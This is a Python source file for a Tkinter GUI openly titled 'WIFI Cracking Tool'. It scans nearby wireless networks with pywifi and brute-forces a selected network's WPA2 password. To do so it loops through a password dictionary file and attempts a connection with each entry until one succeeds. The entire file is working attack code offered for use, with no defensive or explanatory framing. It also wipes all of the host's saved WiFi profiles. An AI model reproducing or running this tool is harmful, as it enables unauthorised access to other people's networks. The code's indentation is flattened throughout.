from tkinter import *
from tkinter import ttk
import pywifi
from pywifi import const
import time
import tkinter.filedialog # Open file browser in GUI
import tkinter.messagebox # Open Tkinter message box
class MY_GUI():
def __init__(self, init_window_name):
self.init_window_name = init_window_name
# Password file path
self.get_value = StringVar() # Set variable content
# Get cracked WiFi account
self.get_wifi_value = StringVar()
# Get WiFi password
self.get_wifimm_value = StringVar()
# Capture network card interface
self.wifi = pywifi.PyWiFi()
# Capture the first wireless network card
self.iface = self.wifi.interfaces()[0]
# Test link to disconnect all links
self.iface.disconnect()
time.sleep(1) # Sleep for 1 second
# Test if the network card is in a disconnected state
assert self.iface.status() in \
[const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]
def __str__(self):
# Automatically called function, returns the network card itself
return '(WIFI:%s,%s)' % (self.wifi, self.iface.name())
# Set window
def set_init_window(self):
self.init_window_name.title("WIFI Cracking Tool")
self.init_window_name.geometry('+500+200')
labelframe = LabelFrame(width=400, height=200, text="Configuration") # Frame, the following objects are added to the labelframe
labelframe.grid(column=0, row=0, padx=10, pady=10)
self.search = Button(labelframe, text="Search Nearby WiFi", command=self.scans_wifi_list).grid(column=0, row=0)
self.pojie = Button(labelframe, text="Start Cracking", command=self.readPassWord).grid(column=1, row=0)
self.label = Label(labelframe, text="Directory Path:").grid(column=0, row=1)
self.path = Entry(labelframe, width=12, textvariable=self.get_value).grid(column=1, row=1)
self.file = Button(labelframe, text="Add Password File Directory", command=self.add_mm_file).grid(column=2, row=1)
self.wifi_text = Label(labelframe, text="WiFi Account:").grid(column=0, row=2)
self.wifi_input = Entry(labelframe, width=12, textvariable=self.get_wifi_value).grid(column=1, row=2)
self.wifi_mm_text = Label(labelframe, text="WiFi Password:").grid(column=2, row=2)
self.wifi_mm_input = Entry(labelframe, width=10, textvariable=self.get_wifimm_value).grid(column=3, row=2,sticky=W)
self.wifi_labelframe = LabelFrame(text="WiFi List")
self.wifi_labelframe.grid(column=0, row=3, columnspan=4, sticky=NSEW)
# Define tree structure and scrollbar
self.wifi_tree = ttk.Treeview(self.wifi_labelframe, show="headings", columns=("a", "b", "c", "d"))
self.vbar = ttk.Scrollbar(self.wifi_labelframe, orient=VERTICAL, command=self.wifi_tree.yview)
self.wifi_tree.configure(yscrollcommand=self.vbar.set)
# Table headers
self.wifi_tree.column("a", width=50, anchor="center")
self.wifi_tree.column("b", width=100, anchor="center")
self.wifi_tree.column("c", width=100, anchor="center")
self.wifi_tree.column("d", width=100, anchor="center")
self.wifi_tree.heading("a", text="WiFi ID")
self.wifi_tree.heading("b", text="SSID")
self.wifi_tree.heading("c", text="BSSID")
self.wifi_tree.heading("d", text="Signal")
self.wifi_tree.grid(row=4, column=0, sticky=NSEW)
self.wifi_tree.bind("<Double-1>", self.onDBClick)
self.vbar.grid(row=4, column=1, sticky=NS)
# Search for WiFi
def scans_wifi_list(self): # Scan surrounding WiFi list
# Start scanning
print("^_^ Starting to scan nearby WiFi...")
self.iface.scan()
time.sleep(15)
# Get scan results after several seconds
scanres = self.iface.scan_results()
# Count the number of hotspots discovered nearby
nums = len(scanres)
print("Count: %s" % (nums))
# Actual data
self.show_scans_wifi_list(scanres)
return scanres
# Display WiFi list
def show_scans_wifi_list(self, scans_res):
for index, wifi_info in enumerate(scans_res):
self.wifi_tree.insert("", 'end', values=(index + 1, wifi_info.ssid, wifi_info.bssid, wifi_info.signal))
# Add password file directory
def add_mm_file(self):
self.filename = tkinter.filedialog.askopenfilename()
self.get_value.set(self.filename)
# Treeview binding event
def onDBClick(self, event):
self.sels = event.widget.selection()
self.get_wifi_value.set(self.wifi_tree.item(self.sels, "values")[1])
# Read password dictionary and match
def readPassWord(self):
self.getFilePath = self.get_value.get()
self.get_wifissid = self.get_wifi_value.get()
pwdfilehander = open(self.getFilePath, "r", errors="ignore")
while True:
try:
self.pwdStr = pwdfilehander.readline()
if not self.pwdStr:
break
self.bool1 = self.connect(self.pwdStr, self.get_wifissid)
if self.bool1:
self.res = "[*] Password correct! WiFi name: %s, matched password: %s " % (self.get_wifissid, self.pwdStr)
self.get_wifimm_value.set(self.pwdStr)
tkinter.messagebox.showinfo('Tip', 'Cracking successful!!!')
print(self.res)
break
else:
self.res = "[*] Password incorrect! WiFi name: %s, matched password: %s" % (self.get_wifissid, self.pwdStr)
print(self.res)
time.sleep(3)
except:
continue
# Match WiFi and password
def connect(self, pwd_Str, wifi_ssid):
# Create WiFi connection file
self.profile = pywifi.Profile()
self.profile.ssid = wifi_ssid # WiFi name
self.profile.auth = const.AUTH_ALG_OPEN # Network card open
self.profile.akm.append(const.AKM_TYPE_WPA2PSK) # WiFi encryption algorithm
self.profile.cipher = const.CIPHER_TYPE_CCMP # Encryption unit
self.profile.key = pwd_Str # Password
self.iface.remove_all_network_profiles() # Delete all WiFi files
self.tmp_profile = self.iface.add_network_profile(self.profile) # Set new connection file
self.iface.connect(self.tmp_profile) # Connect
time.sleep(5)
if self.iface.status() == const.IFACE_CONNECTED: # Check if connected
isOK = True
else:
isOK = False
self.iface.disconnect() # Disconnect
time.sleep(1)
# Check disconnection status
assert self.iface.status() in \
[const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]
return isOK
def gui_start():
init_window = Tk()
ui = MY_GUI(init_window)
print(ui)
ui.set_init_window()
init_window.mainloop()
if __name__ == "__main__":
gui_start()